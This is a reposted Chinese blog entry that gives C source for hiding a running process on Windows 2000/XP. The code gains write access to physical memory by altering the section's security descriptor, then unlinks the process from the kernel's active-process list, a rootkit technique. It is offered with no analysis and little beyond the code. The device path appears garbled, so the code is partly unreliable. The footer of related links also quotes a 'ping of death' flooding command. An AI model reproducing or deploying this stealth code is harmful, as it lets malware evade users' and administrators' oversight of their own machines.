在win2k和xp下隐藏进程 转

最新推荐文章于 2020-11-05 22:36:33 发布
最新推荐文章于 2020-11-05 22:36:33 发布
阅读量690 收藏
点赞数
分类专栏: ring0 文章标签: xp attributes null access object string
在win2k和xp下隐藏进程 转
2008年03月16日 星期日 11:56 
//Hide Process
#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>
#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK 
{
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _UNICODE_STRING 
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#define OBJ_INHERIT                0x00000002L
#define OBJ_PERMANENT            0x00000010L
#define OBJ_EXCLUSIVE            0x00000020L
#define OBJ_CASE_INSENSITIVE    0x00000040L
#define OBJ_OPENIF                0x00000080L
#define OBJ_OPENLINK            0x00000100L
#define OBJ_KERNEL_HANDLE        0x00000200L
#define OBJ_VALID_ATTRIBUTES    0x000003F2L
typedef struct _OBJECT_ATTRIBUTES 
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------

BOOL InitNTDLL()
{
    g_hNtDLL = LoadLibrary("ntdll.dll");
    if (NULL == g_hNtDLL)
        return FALSE;
    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, 
"RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

    return TRUE;
}
//---------------------------------------------------------------------------

VOID CloseNTDLL()
{
    if(NULL != g_hNtDLL)
        FreeLibrary(g_hNtDLL);
    g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------

VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) 
{ 
    PACL pDacl                    = NULL; 
    PSECURITY_DESCRIPTOR pSD    = NULL; 
    PACL pNewDacl = NULL; 
    
    DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_IN
FORMATION, NULL, 
NULL, &pDacl, NULL, &pSD);
    if(ERROR_SUCCESS != dwRes)
    {
    if(pSD) 
        LocalFree(pSD); 
    if(pNewDacl) 
        LocalFree(pNewDacl); 
    }
    EXPLICIT_ACCESS ea; 
    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); 
    ea.grfAccessPermissions = SECTION_MAP_WRITE; 
    ea.grfAccessMode = GRANT_ACCESS; 
    ea.grfInheritance= NO_INHERITANCE; 
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; 
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER; 
    ea.Trustee.ptstrName = "CURRENT_USER"; 
    dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
    
    if(ERROR_SUCCESS != dwRes)
    {
    if(pSD) 
        LocalFree(pSD); 
    if(pNewDacl) 
        LocalFree(pNewDacl); 
    }
    dwRes = SetSecurityInfo
(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);

    
    if(ERROR_SUCCESS != dwRes)
    {
    if(pSD) 
        LocalFree(pSD); 
    if(pNewDacl) 
        LocalFree(pNewDacl); 
    }
} 
//---------------------------------------------------------------------------

HANDLE OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;
    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx (&g_osvi);
    if (5 != g_osvi.dwMajorVersion)
        return NULL;
    switch(g_osvi.dwMinorVersion)
    {
        case 0:
            PhyDirectory = 0x30000;
            break; //2k
        case 1:
            PhyDirectory = 0x39000;
            break; //xp
        default:
            return NULL;
    }
    RtlInitUnicodeString(&physmemString, L"//Device//PhysicalMemory");
    attributes.Length                    = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory            = NULL;
    attributes.ObjectName                = &physmemString;
    attributes.Attributes                = 0;
    attributes.SecurityDescriptor        = NULL;
    attributes.SecurityQualityOfService    = NULL;
    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attri
butes); 
    if(status == STATUS_ACCESS_DENIED)
    { 
        status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); 

        SetPhyscialMemorySectionCanBeWrited(g_hMPM); 
        CloseHandle(g_hMPM);
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &a
ttributes); 
    }
    if(!NT_SUCCESS(status)) 
        return NULL;
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE,
 0, PhyDirectory, 
0x1000);
    if( g_pMapPhysicalMemory == NULL )
        return NULL;
    return g_hMPM;
}
//---------------------------------------------------------------------------

PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
    PGDE = BaseAddress[VAddr>>22];
    if (0 == (PGDE&1))
        return 0;
    ULONG tmp = PGDE & 0x00000080;
    if (0 != tmp)
    {
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);

        PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
        
        if (0 == (PTE&1))
            return 0;
        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
    }
    return (PVOID)PAddr;
}
//---------------------------------------------------------------------------

ULONG GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr
);
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0
, phys & 
0xfffff000, 0x1000);
    
    if (0 == tmp)
        return 0;
    ULONG ret = tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);
    return ret;
}
//---------------------------------------------------------------------------

BOOL SetData(PVOID addr,ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr
);
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfff
ff000, 0x1000);
    if (0 == tmp)
        return FALSE;
    tmp[(phys & 0xFFF)>>2] = data;
    UnmapViewOfFile(tmp);
    return TRUE;
}
//---------------------------------------------------------------------------

long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
   ExitProcess(0);
   return 1 ;
}
//---------------------------------------------------------------------------

BOOL YHideProcess()
{
//    SetUnhandledExceptionFilter(exeception);
    if (FALSE == InitNTDLL())
        return FALSE;
    if (0 == OpenPhysicalMemory())
        return FALSE;
    ULONG thread  = GetData((PVOID)0xFFDFF124); //kteb
    ULONG process = GetData(PVOID(thread + 0x44)); //kpeb
    ULONG fw, bw;
    if (0 == g_osvi.dwMinorVersion)
    {
        fw = GetData(PVOID(process + 0xa0));
        bw = GetData(PVOID(process + 0xa4));        
    }
    if (1 == g_osvi.dwMinorVersion)
    {
        fw = GetData(PVOID(process + 0x88));
        bw = GetData(PVOID(process + 0x8c));
    }
        
    SetData(PVOID(fw + 4), bw);
    SetData(PVOID(bw), fw);
    CloseHandle(g_hMPM);
    CloseNTDLL();
    return TRUE;
}
BOOL HideProcess()
{
 static BOOL b_hide = false;
 if (!b_hide)
 {
  b_hide = true;
  YHideProcess();
  return true;
 }
 return true;
}
waveradio
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
侦测隐藏进程的强文
qq_43746825的博客
02-25 317
侦测隐藏进程的强文
】MFC隐藏进程自身(任务管理器不可见,wSysCheck等工具可见)
weixin_34253539的博客
01-02 292
只要把cpp和h加入工程,include就可以了。 代码地址: //------------------HideProcess.h-------------------- //加入MFC工程调用即可 BOOL HideProcess(); //------------------HideProcess.cpp------------------ #include "s...
进程线程 1.EPROCESS进程隐藏
Mikasys的博客
11-05 1363
一、EPROCESS结构体 EPROCESS结构 kd> dt _EPROCESS ntdll!_EPROCESS +0x000 Pcb : _KPROCESS +0x06c ProcessLock : _EX_PUSH_LOCK +0x070 CreateTime : _LARGE_INTEGER +0x078 ExitTime : _LARGE_INTEGER +0x080 RundownProtect
hide process
gclu212的专栏
11-08 1062
///////////////////////////////////////////////////////////////////////////// //HideProcess.cpp #include "stdafx.h"#include #include #include #include"HideProcess.h" #define NT_SUCCESS(Status)((NT
隐藏进程的unit HideProcess
随矜而去 BLOG
08-31 876
unit HideProcess;interfacefunction MyHideProcess: Boolean;implementationusesWindows, SysUtils, Variants, Classes, AclAPI, accCtrl;typeNTSTATUS = LongInt;const//NT_SUC
WinNT & Win2K下实现进程的完全隐藏
tiger777的专栏
02-01 725
        在WinNT下"真正隐藏进程"这一说法,可以讲是根本不可能实现,只要我们的程序是以进程内核的形式运行,都是不可能逃离CTRL+ALT+DEL的法眼。那么奇怪了,这岂不是与我们的标题《WinNT &  Win2K下实现进程的完全隐藏》相矛盾吗?是的,实际上应该是:以非进程方式执行目标代码,而逃避进程查看器的检查,从而达到"进程隐藏"的目的。         我们这里用的,是在宿主进程
检测隐藏进程
a572893208的博客
10-15 577
许多用户都有过用Windows自带的任务管理器查看所有进程的经验,并且很多人都认为在任务管理器中隐藏进程是不可能的。而实际上,进程隐藏是再简单不过的事情了。有许多可用的方法和参考源码可以达到进程隐藏的目的。令我惊奇的是只有很少一部分的木马使用了这种技术。估计1000个木马中仅有1个是进程隐藏的。我认为木马的作者太懒了,因为隐藏进程需要进行的额外工作仅仅是...
恢复Win2K/XP系统服务描述表(翻译)
08-17 2168
Win2K/XP SDT Restore 0.2 (Proof-Of-Concept)by Tan Chew Keong恢复Win2K/XP系统服务描述表网址:http://www.security.org.sg/code/sdtrestore.html简介Win32内核Rootkits一般都通过对内核Native API进行hook来完成,它需要修改服务描述表(SDT)。这种修改必须让Rootk
win2k-xp进程隐藏.rar
11-01
总之,"win2k-xp进程隐藏.rar"这个压缩包可能包含了一系列关于如何在Windows 2000和XP系统中隐藏进程的技术和工具。了解这些知识可以帮助用户更好地管理和保护自己的系统,但同时也需谨慎,以免被恶意软件利用。在...
win2k/xp进程隐藏
02-23
win2k/xp系统下,应用程序进程隐藏
星语系统优化 XP v5.7.rar
07-14
星语系统优化 XP本身在Windows XP下开发而来,很多朋友担心WIN2KWIN2K3、VISTA、WIN7下无法使 用本软件,而你完全不用担心在其他系统使用中导致错误问题,星语系统优化 XP已经能够很顺利的在其 他系统中稳定的...
cmd操作命令和linux命令大全收集
04-24
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 tlist -t 以...
Windows Sysinternals Suite v2019.06.29.zip
07-14
创建 Win2K NTFS 符号链接。 LDMDump 储逻辑磁盘管理器在磁盘上的数据库内容,其中说明了 Windows 2000 动态磁盘的分区情况。 ListDLLs 列出所有当前加载的 DLL,包括加载位置及其版本号。2.0 版将打印已加载...
HideProcess(隐藏进程) Ring0 win7 x86
拉塞尔的博客
11-23 3107
    我们可以通过遍历EProcess结构体中的双向链表ActiveProcessLinks,找到目标进程结点后将该节点从双向链表中移除,便实现了进程隐藏的目的,此时打开win7的任务管理器会发现运行的calc进程并没有显示。 使用windbg查看EProcess结构:     2: kd&gt; !process 0 0     //crtl+F查找explorer     PROCESS ...
b050闲置图书分享-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-23
本次开发的闲置图书分享平台实现了收货地址管理、字典管理、公告管理、留言板管理、图书管理、图书收藏管理、图书评价管理、图书订单管理、用户管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让闲置图书分享平台更能从理念走到现实,确确实实的让人们提升信息处理效率。 管理图书的数据,此页面主要实现图书的增加、修改、删除、查看的功能。公告信息管理页面提供的功能操作有:新增公告,修改公告,删除公告操作。公告类型管理页面显示所有公告类型,在此页面既可以让管理员添加新的公告信息类型,也能对已有的公告类型信息执行编辑更新,失效的公告类型信息也能让管理员快速删除。
《大学生职业生涯规划与就业指导》大一阶段课程作业
最新发布
07-24
《大学生职业生涯规划与就业指导》大一阶段课程作业
开题报告潮汕特产直销系统 已通过开题答辩的.doc
07-23
随着互联网的高速发展,人们的生活方式发生了翻天覆地的变化,在过去,人们想要购买很远地方的东西会非常麻烦,因为是通信和交通都不是十分的方便,而现在网络购物成为了人们日常生活中不可或缺的一部分。在这样的背景下,互联网与传统行业的融合已经成为了一种不可阻挡的趋势。对于中国特色的潮汕特产来说,这一趋势也带来了巨大的变革和发展机遇[1]。
cp210x_vcp_win2k_xp_s2k3
10-06
cp210x_vcp_win2k_xp_s2k3驱动程序是为了确保在Windows 2000、Windows XPWindows Server 2003操作系统上实现与CP210x芯片之间的通信功能。通过安装这个驱动程序,我们可以使计算机识别并与连接到CP210x芯片的设备...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值